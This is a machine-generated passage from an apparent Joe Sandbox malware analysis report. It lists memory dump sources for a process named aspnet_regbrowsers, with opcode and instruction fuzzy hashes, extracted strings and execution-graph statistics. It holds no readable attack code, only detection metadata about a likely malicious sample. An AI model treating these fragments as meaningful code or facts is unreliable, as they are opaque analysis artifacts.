                                                                                                                                                                                        • Opcode Fuzzy Hash: 29eb6be1a5907764834c011fb794419dc2f5c7b09461b4e8702059846b452196
                                                                                                                                                                                        • Instruction Fuzzy Hash: FC21CF75604240EFEB05DF10E9C4F26BBA5FB98714F24C6BDE8494B246C33AD846CB61
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000011.00000002.485968434.00000000001CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001CD000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_1cd000_aspnet_regbrowsers.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 9c8a22de58fdbfe88abc29b6c2d9fd69babe2da3f98eb748c7f56a6b4caa0543
                                                                                                                                                                                        • Instruction ID: f33404cb942d4c26b42e488db9632faa830a32b117f97ad71961ea9c9859fc7c
                                                                                                                                                                                        • Opcode Fuzzy Hash: 9c8a22de58fdbfe88abc29b6c2d9fd69babe2da3f98eb748c7f56a6b4caa0543
                                                                                                                                                                                        • Instruction Fuzzy Hash: CE2180755083809FDB02CF14D994B15BF71EB56314F28C5EAD8498F267C33AD85ACB62
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000011.00000002.487007637.00000000007D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7d0000_aspnet_regbrowsers.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 7fbd11218169e99a06bfda7409972cbeba651b2077fdd4b07dbd032fb77bf842
                                                                                                                                                                                        • Instruction ID: 6f1e74dc259d0e73e142016f0a085e38a7821ec25a88d88bea86914e4784e82a
                                                                                                                                                                                        • Opcode Fuzzy Hash: 7fbd11218169e99a06bfda7409972cbeba651b2077fdd4b07dbd032fb77bf842
                                                                                                                                                                                        • Instruction Fuzzy Hash: BB211478A05228EFDB20CF54CC44BECB7B5BB59300F6080EAD549A6281DB75AAC5DF10
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000011.00000002.485819539.00000000001BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001BD000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_1bd000_aspnet_regbrowsers.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 085e9a923e8aedba8eff152319287174092cc1e6cad3e562e97f6467fdc287f8
                                                                                                                                                                                        • Instruction ID: 8826052830bf4ccdb76bf6ce114a4fca2be3cb08ae671ee6a3c1b46c7e61c587
                                                                                                                                                                                        • Opcode Fuzzy Hash: 085e9a923e8aedba8eff152319287174092cc1e6cad3e562e97f6467fdc287f8
                                                                                                                                                                                        • Instruction Fuzzy Hash: 6811D376504280CFDB15CF10E9C4B56BF71FB94314F24C6A9D8494B616C33AD95ACBA2
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000011.00000002.485968434.00000000001CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001CD000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_1cd000_aspnet_regbrowsers.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 9166c7a4dd2eec6ce831343740cf9da501b323eca94e9702a4ab88c0cd9770f2
                                                                                                                                                                                        • Instruction ID: 0df6c04bdbd491637102cd9de708d34191c86e5171d6e6794058e3b733de424b
                                                                                                                                                                                        • Opcode Fuzzy Hash: 9166c7a4dd2eec6ce831343740cf9da501b323eca94e9702a4ab88c0cd9770f2
                                                                                                                                                                                        • Instruction Fuzzy Hash: 23118B76504280DFDB11CF10D9C4B15BBB1FB94314F24C6AED8494B656C33AD84ACFA2
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000011.00000002.487007637.00000000007D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7d0000_aspnet_regbrowsers.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 85280a46d065196bd27033df86ffd9c7cd84380f9b650ee43bdd2c6c70185257
                                                                                                                                                                                        • Instruction ID: 0152cc2a033aa917789cb243eb9db02102f32474c9660110b42fa8961178920c
                                                                                                                                                                                        • Opcode Fuzzy Hash: 85280a46d065196bd27033df86ffd9c7cd84380f9b650ee43bdd2c6c70185257
                                                                                                                                                                                        • Instruction Fuzzy Hash: 9F112874D08218EFCB60CF94C844BECB7B9BF49301F64909AD40EA6361D7355A86DF00
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000011.00000002.487007637.00000000007D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7d0000_aspnet_regbrowsers.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 488c3431f2c9f48ecec18d2fb7e52fbb5acfd6f89859f4f6da8fe649f0f0fb1a
                                                                                                                                                                                        • Instruction ID: 86b2646e1e3f57ba9fbf85ee8c2de4c8c364a1ba40c83abc97c1da2d59477f0d
                                                                                                                                                                                        • Opcode Fuzzy Hash: 488c3431f2c9f48ecec18d2fb7e52fbb5acfd6f89859f4f6da8fe649f0f0fb1a
                                                                                                                                                                                        • Instruction Fuzzy Hash: 4D11F839904228DFCB24CF64D9547E8BBB4AB49315F6481DA841EA3391C7399BC6DF40
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000011.00000002.487007637.00000000007D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7d0000_aspnet_regbrowsers.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 746deb63bb2a61b81e6ca4cec717a1662d9c99d6192d38b69a4a0ee8ef469ee4
                                                                                                                                                                                        • Instruction ID: 94a49a632192856d76b97688759a8c30b3d4b935b9d6acbecfefbe3f0e557790
                                                                                                                                                                                        • Opcode Fuzzy Hash: 746deb63bb2a61b81e6ca4cec717a1662d9c99d6192d38b69a4a0ee8ef469ee4
                                                                                                                                                                                        • Instruction Fuzzy Hash: 9C11A2B4D04209DFCB44DFA9C5456AEBBF9FF89300F20916AC819A3350E7349A52DF91
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000011.00000002.487007637.00000000007D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7d0000_aspnet_regbrowsers.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: f841e1fac45e650c91e712dcb27c005757c4c90a688ab2a07671967349a326fc
                                                                                                                                                                                        • Instruction ID: 5757a2d5dca48519bacf9550846fd782c892de214cf1277825376c1a226d2313
                                                                                                                                                                                        • Opcode Fuzzy Hash: f841e1fac45e650c91e712dcb27c005757c4c90a688ab2a07671967349a326fc
                                                                                                                                                                                        • Instruction Fuzzy Hash: 5A11F3B1904228DFDB60DF54C885BECB7B4AB09305F6480D6D50DA7282D7789EC9CF50
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000011.00000002.487007637.00000000007D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7d0000_aspnet_regbrowsers.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 8e43f4f0378cf775788d8230d3168346f3575816b3684ddf1899635aa8323bfa
                                                                                                                                                                                        • Instruction ID: cc0159a1256baaaa3c0e2da061b863c249263fa39f0a02741626b0513e2238bc
                                                                                                                                                                                        • Opcode Fuzzy Hash: 8e43f4f0378cf775788d8230d3168346f3575816b3684ddf1899635aa8323bfa
                                                                                                                                                                                        • Instruction Fuzzy Hash: 1B014039808268DFCB14CF64D9946E8BBB4FF49314F1484EAC54EA7292D7354B85DF50
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000011.00000002.487007637.00000000007D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7d0000_aspnet_regbrowsers.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: e49145ab8853812b04e61e1cd2fbbae61f7b5c245494a6e6620995341b520f90
                                                                                                                                                                                        • Instruction ID: 2ec4de2dfb3d19c9842819fa3056d1bc94cbd9ea8d42fc27d60a0784cb3dab3f
                                                                                                                                                                                        • Opcode Fuzzy Hash: e49145ab8853812b04e61e1cd2fbbae61f7b5c245494a6e6620995341b520f90
                                                                                                                                                                                        • Instruction Fuzzy Hash: 9E011639819268DFCB24DF64D9547ECBBB8AB49311F5491DAC04EA23A2C7384BC5DF50
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000011.00000002.487007637.00000000007D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7d0000_aspnet_regbrowsers.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 486e1b9d8e7d90799438bc9491142547121e30c31d9ea96f976bc7de047b849b
                                                                                                                                                                                        • Instruction ID: 8dd7ec84c7adcdbac972f1e216e6d2ead1a5efd890b05323bf3df009e314b11d
                                                                                                                                                                                        • Opcode Fuzzy Hash: 486e1b9d8e7d90799438bc9491142547121e30c31d9ea96f976bc7de047b849b
                                                                                                                                                                                        • Instruction Fuzzy Hash: 8701FB39814228DFCB64CF64D8546ECB7B4BB49311F5080DAC45EA23A1C7345BC6DF50
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000011.00000002.487007637.00000000007D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7d0000_aspnet_regbrowsers.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 7f0a95cdd700f6c091000c8dcf286141f2fe0a874f0f9725160d3e2e95031a2a
                                                                                                                                                                                        • Instruction ID: eeb4856fe05e37abe051f3aef90ad14bbe1616b449676ab838434131019469ec
                                                                                                                                                                                        • Opcode Fuzzy Hash: 7f0a95cdd700f6c091000c8dcf286141f2fe0a874f0f9725160d3e2e95031a2a
                                                                                                                                                                                        • Instruction Fuzzy Hash: 4DF03074944208DFC714DF64E945A59BBB8AB86300F1091A6C404A3290CF745A41CF44
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000011.00000002.487007637.00000000007D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7d0000_aspnet_regbrowsers.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 80a8c4a0cfc2df29dd9548fbe00d686e545592b49382d7181764f7df650442dc
                                                                                                                                                                                        • Instruction ID: 4783d4a820d0d514e59b970a595a648f48b37956fbc58445f3052a7858983afa
                                                                                                                                                                                        • Opcode Fuzzy Hash: 80a8c4a0cfc2df29dd9548fbe00d686e545592b49382d7181764f7df650442dc
                                                                                                                                                                                        • Instruction Fuzzy Hash: DBF0E579E09218DFDF25CFA4DD50BECBBB5AB49300F24509A950CAB3A2D3355A81DF00
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000011.00000002.487007637.00000000007D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7d0000_aspnet_regbrowsers.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: b7d35bf8af5b69752cc1409f9ec70faa329de783733659ff8b6bfcc55be9facc
                                                                                                                                                                                        • Instruction ID: 525b613dfe1fd7d550d16c24f14b8dfc255358c0fbf92a24ea5d3d13f434eea7
                                                                                                                                                                                        • Opcode Fuzzy Hash: b7d35bf8af5b69752cc1409f9ec70faa329de783733659ff8b6bfcc55be9facc
                                                                                                                                                                                        • Instruction Fuzzy Hash: E9E01230A05358EFC705DB64D956A8DBFF9AB41700F1001EAD444972A1D7315B50CB92
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000011.00000002.487007637.00000000007D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7d0000_aspnet_regbrowsers.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 6d22890328f0cd9ac452264041c526fd0691e90793d894d864e2c43e065ea674
                                                                                                                                                                                        • Instruction ID: b9eccc7d19bd920241945b8419b7f9333847f4ae87b9473b514c4d703d7b8d92
                                                                                                                                                                                        • Opcode Fuzzy Hash: 6d22890328f0cd9ac452264041c526fd0691e90793d894d864e2c43e065ea674
                                                                                                                                                                                        • Instruction Fuzzy Hash: 1BD0123494920CEBC704DBA4D9457AC7B7DA746700F206196D80823341CB351A41E6D5
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000011.00000002.487007637.00000000007D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7d0000_aspnet_regbrowsers.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: e5bbd37132bac02922942e673a7172772ea8465b44522c9cfcbc2e79fa3e9302
                                                                                                                                                                                        • Instruction ID: 322903e15b626ceb7c38e7984c7ad25a0c7e56939f7311ce1a2c175323f422f9
                                                                                                                                                                                        • Opcode Fuzzy Hash: e5bbd37132bac02922942e673a7172772ea8465b44522c9cfcbc2e79fa3e9302
                                                                                                                                                                                        • Instruction Fuzzy Hash: 3CD0E23090020CEFCB44EBA8A84569DBBB8AB44701F1041A98848A2340EB319A80CB81
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000011.00000002.487007637.00000000007D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7d0000_aspnet_regbrowsers.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: e78c9adae79e335149f3535c4a2b34d7189155b1a3611a09a59af79dd534fed7
                                                                                                                                                                                        • Instruction ID: a7875354b27d62dc57db17864eea4137306c7a95906861f308f5a338f171a129
                                                                                                                                                                                        • Opcode Fuzzy Hash: e78c9adae79e335149f3535c4a2b34d7189155b1a3611a09a59af79dd534fed7
                                                                                                                                                                                        • Instruction Fuzzy Hash: F4D05E3480520CDBC704EFA4E945A9DBB78AB46305F2052A9C80433350CF311E45DB89
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000011.00000002.487007637.00000000007D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7d0000_aspnet_regbrowsers.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 86c954bf004a3f6b3190cb6e15364418bdd6b0e2d32b4e171f57672280600e09
                                                                                                                                                                                        • Instruction ID: 1f3c6a82718fa5e8d19d589e713e70e93d6a24c3fac437e6ef75b71868cf0b6b
                                                                                                                                                                                        • Opcode Fuzzy Hash: 86c954bf004a3f6b3190cb6e15364418bdd6b0e2d32b4e171f57672280600e09
                                                                                                                                                                                        • Instruction Fuzzy Hash: 33E0E238904228CFCB10DF60C994BE8BBF5BB4C314F1481DA8409A7392C336AA86CF00
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000011.00000002.487007637.00000000007D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7d0000_aspnet_regbrowsers.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: a2f7898a4b591529120b9bc8fa1b309a916819711808d92871834a254004fd1f
                                                                                                                                                                                        • Instruction ID: ee01ed9b542254a859b7d43d5238f5df56ead5b03252fab4686723f75707c811
                                                                                                                                                                                        • Opcode Fuzzy Hash: a2f7898a4b591529120b9bc8fa1b309a916819711808d92871834a254004fd1f
                                                                                                                                                                                        • Instruction Fuzzy Hash: 93C0127050510CDBC714DBA5E816F6D7B6CD781611F401199D90953350DB725E50CB95
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000011.00000002.486065891.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_250000_aspnet_regbrowsers.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: @2i
                                                                                                                                                                                        • API String ID: 0-1455806815
                                                                                                                                                                                        • Opcode ID: 57cdeabade328d0cefefdd441ae535522fddf40f98bd07c519b5596479a43f50
                                                                                                                                                                                        • Instruction ID: 5fa9246c05c6a2ee53470aa751e63da26b52ef682d6723b3f353bea6f4eb0045
                                                                                                                                                                                        • Opcode Fuzzy Hash: 57cdeabade328d0cefefdd441ae535522fddf40f98bd07c519b5596479a43f50
                                                                                                                                                                                        • Instruction Fuzzy Hash: 6AE14874E102598FDB14DFA8C580AAEFBB2FF89305F248169D814AB356D730AD45CFA4
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000011.00000002.486065891.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_250000_aspnet_regbrowsers.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: h6i
                                                                                                                                                                                        • API String ID: 0-83299075
                                                                                                                                                                                        • Opcode ID: aced82dd2daaaf22788765e47bdee3086f972733e1a8886be23d2c77c01d67ab
                                                                                                                                                                                        • Instruction ID: 1e3658a31d3a2d382d5ba62e05965b32fed56aa6d59cf25fb920193e2d6eaf01
                                                                                                                                                                                        • Opcode Fuzzy Hash: aced82dd2daaaf22788765e47bdee3086f972733e1a8886be23d2c77c01d67ab
                                                                                                                                                                                        • Instruction Fuzzy Hash: 6FE12A74E101198FDB14DFA8C580AADFBB2FF88305F248169D815AB356DB30AD45CFA4
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000011.00000002.486065891.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_250000_aspnet_regbrowsers.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: |0i
                                                                                                                                                                                        • API String ID: 0-1233299241
                                                                                                                                                                                        • Opcode ID: 6fa514b5145778760c6ebb4f73ee68cf52556a201b10535675c493be2f28cedb
                                                                                                                                                                                        • Instruction ID: 85c376735d54f276c0d93abe3865d32728692dfe0ec46dfeaa00d1c4dc837496
                                                                                                                                                                                        • Opcode Fuzzy Hash: 6fa514b5145778760c6ebb4f73ee68cf52556a201b10535675c493be2f28cedb
                                                                                                                                                                                        • Instruction Fuzzy Hash: C6E12974E102198FDB14DFA8C580AADFBB2FF88305F248169D815AB356DB30AD45CFA4
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000011.00000002.486065891.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_250000_aspnet_regbrowsers.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: ccaf23c551796010d1b8e02f635fbc086bf19c462491081ca1eaae22a0358596
                                                                                                                                                                                        • Instruction ID: 092f372ff58e51be83ea432f3d826735a9bb86ceca6d3389bff48b231340ffb7
                                                                                                                                                                                        • Opcode Fuzzy Hash: ccaf23c551796010d1b8e02f635fbc086bf19c462491081ca1eaae22a0358596
                                                                                                                                                                                        • Instruction Fuzzy Hash: 4402DD70A24125CFCB04DFA9D480ABDF7B1AF94306F248167E825EB291C374DD95CB58
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000011.00000002.486065891.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_250000_aspnet_regbrowsers.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 1968894268c1f3ebf8859651972424da70f9033e899b5a74bf4332b19590d562
                                                                                                                                                                                        • Instruction ID: c344f54e15c1729cded80c9029523b850270bced3fda2730ee240def8603b403
                                                                                                                                                                                        • Opcode Fuzzy Hash: 1968894268c1f3ebf8859651972424da70f9033e899b5a74bf4332b19590d562
                                                                                                                                                                                        • Instruction Fuzzy Hash: 9FD14570A24A65DFCB00DFA4C8A0ABEBBF1BF45302F5481AAD856DB381C370E955CB55
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000011.00000002.486065891.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_250000_aspnet_regbrowsers.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 0d2c4c92f38cf7a54b281bd4d99df69881dd08c96081d8c5aa90c0fe61f51518
                                                                                                                                                                                        • Instruction ID: 463de38cb08c045358e595ad2c49fa0c7d7dae0eb359ff9308c1512ba068eb2d
                                                                                                                                                                                        • Opcode Fuzzy Hash: 0d2c4c92f38cf7a54b281bd4d99df69881dd08c96081d8c5aa90c0fe61f51518
                                                                                                                                                                                        • Instruction Fuzzy Hash: 80E12974E102598FDB14DFA8C580AADFBB2FF88305F248169D815AB356E730AD45CFA4
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000011.00000002.486065891.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_250000_aspnet_regbrowsers.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 9708b3f73cf845e4a7103e08a53d0daac061dc96f315957bcfc4e1877baec789
                                                                                                                                                                                        • Instruction ID: 6deb65e044a46866682bb19e0a96d09360caaf9949dc6bc4160440cf7d775fff
                                                                                                                                                                                        • Opcode Fuzzy Hash: 9708b3f73cf845e4a7103e08a53d0daac061dc96f315957bcfc4e1877baec789
                                                                                                                                                                                        • Instruction Fuzzy Hash: 24E12A74E102198FDB14DFA8C580AADFBB2FF89305F248169D815AB356D730AD46CF64
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000011.00000002.487007637.00000000007D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7d0000_aspnet_regbrowsers.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 56a0e526a4028f9633f2addc0a2f4fa3c932d52db3624ba8a9f6fcd426037814
                                                                                                                                                                                        • Instruction ID: efcba7b9e571ebf72d7cd76ebeee6146f0703a1b92750c0af29854582b3ac98a
                                                                                                                                                                                        • Opcode Fuzzy Hash: 56a0e526a4028f9633f2addc0a2f4fa3c932d52db3624ba8a9f6fcd426037814
                                                                                                                                                                                        • Instruction Fuzzy Hash: 4EC08C2A98E100E3C5000A8075040F8B33CEADB222F51B0A3850EB36028228821561A8

                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                        Execution Coverage:0.3%
                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                        Signature Coverage:33.3%
                                                                                                                                                                                        Total number of Nodes:6
                                                                                                                                                                                        Total number of Limit Nodes:1
                                                                                                                                                                                        execution_graph 65742 a46c39 65743 a46c45 __except1 65742->65743 65744 a4ee06 __fassign 65743->65744 65747 9efea0 LdrInitializeThunk 65743->65747 65746 a46c66 __except1 65747->65746 65748 9ef900 LdrInitializeThunk
                                                                                                                                                                                        APIs
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000016.00000002.512818584.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AE0000.00000040.00001000.00020000.00000000.sdmpDownload File
